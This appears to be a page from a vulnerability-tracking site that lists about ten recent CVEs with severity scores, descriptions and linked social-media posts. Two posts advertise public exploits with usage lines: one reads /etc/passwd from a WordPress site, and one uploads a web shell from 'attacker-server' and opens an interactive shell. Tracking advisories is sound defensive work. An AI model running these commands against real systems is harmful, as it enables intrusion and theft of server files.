24h | 7d | 30d

Overview

  • Beckhoff Automation
  • Beckhoff.Device.Manager.XAR

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
0.18%

KEV

Description

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within privileged processes.

Statistics

  • 2 Posts

Last activity: 21 hours ago

Fediverse

Profile picture

🟠 CVE-2025-41726 - High (8.8)

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 21h ago
Profile picture

VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

certvde.com/en/advisories/vde-

beckhoff.csaf-tp.certvde.com/.

  • 0
  • 0
  • 0
  • 22h ago

Overview

  • Beckhoff Automation
  • Beckhoff.Device.Manager.XAR

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
0.02%

KEV

Description

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

Statistics

  • 2 Posts

Last activity: 21 hours ago

Fediverse

Profile picture

🟠 CVE-2025-41727 - High (7.8)

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 21h ago
Profile picture

VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

certvde.com/en/advisories/vde-

beckhoff.csaf-tp.certvde.com/.

  • 0
  • 0
  • 0
  • 22h ago

Overview

  • Veeam Backup & Replication

10 Mar 2023
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
83.53%

Description

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 21 hours ago

Bluesky

Profile picture
JobTwo from VulnLab now on HackTheBox is the sequel to Job from VulnLab. Phishing with Word macros, hMailServer database decryption with a known Blowfish key, password cracking, and CVE-2023-27532 in Veeam Backup & Replication for SYSTEM.
  • 1
  • 3
  • 1
  • 21h ago

Overview

  • dnnsoftware
  • Dnn.Platform

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (7.7)
EPSS
Pending

KEV

Description

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during some module operations in the Persona Bar. Versions 9.13.10 and 10.2.0 contain a fix for the issue.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 9 hours ago

Fediverse

Profile picture

🟠 CVE-2026-24837 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 1
  • 0
  • 0
  • 9h ago

Overview

  • Enhancesoft
  • osTicket

12 Jan 2026
Published
22 Jan 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
4.28%

KEV

Description

Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 23 hours ago

Fediverse

Profile picture

Die Detektion offen aus dem Internet erreichbarer osTicket-Systeme konnte verbessert werden. Damit sind uns aktuell rund 1.700 Systeme bei deutschen Netzbetreibern bekannt.

Davon laufen 22% mit der aktuellen Version 1.17.7 oder 1.18.3, welche die Schwachstelle CVE-2026-22200 schließt.

50% laufen mit veralteten Versionen 1.17.x bzw. 1.18.x.

28% laufen mit Versionen 1.9 bis 1.16, die nicht mehr vom Hersteller unterstützt werden.

  • 0
  • 2
  • 0
  • 23h ago

Overview

  • extendthemes
  • Kubio AI Page Builder

28 Mar 2025
Published
28 Mar 2025
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
54.35%

KEV

Description

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 14 hours ago

Fediverse

Profile picture

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: github.com/fumioryoto/CVE-2025

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u example.com -f /etc/passwd

  • 0
  • 1
  • 0
  • 14h ago

Overview

  • jurredeklijn
  • Wux Blog Editor

26 Oct 2024
Published
23 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
81.47%

KEV

Description

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 14 hours ago

Fediverse

Profile picture

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: github.com/JoshuaProvoste/0-cl

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

  • 0
  • 1
  • 0
  • 14h ago

Overview

  • appsmithorg
  • appsmith

12 Jan 2026
Published
13 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.7)
EPSS
0.03%

KEV

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 13 hours ago

Fediverse

Profile picture

‼️ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection

GitHub: github.com/MalikHamza7/CVE-202

CVSS: 9.6

Writeup: resecurity.com/blog/article/cv

  • 0
  • 1
  • 0
  • 13h ago

Overview

  • OISF
  • suricata

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (7.5)
EPSS
Pending

KEV

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running out of memory, potentially leading to it getting killed by the OOM killer. Versions 8.0.3 or 7.0.14 contain a patch. As a workaround, disable the DNP3 parser in the suricata yaml (disabled by default).

Statistics

  • 1 Post

Last activity: 16 hours ago

Fediverse

Profile picture

🟠 CVE-2026-22259 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 16h ago

Overview

  • Mozilla
  • Firefox

27 Jan 2026
Published
28 Jan 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.

Statistics

  • 1 Post

Last activity: 16 hours ago

Fediverse

Profile picture

🟠 CVE-2026-24869 - High (8.1)

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 16h ago
Showing 11 to 20 of 93 CVEs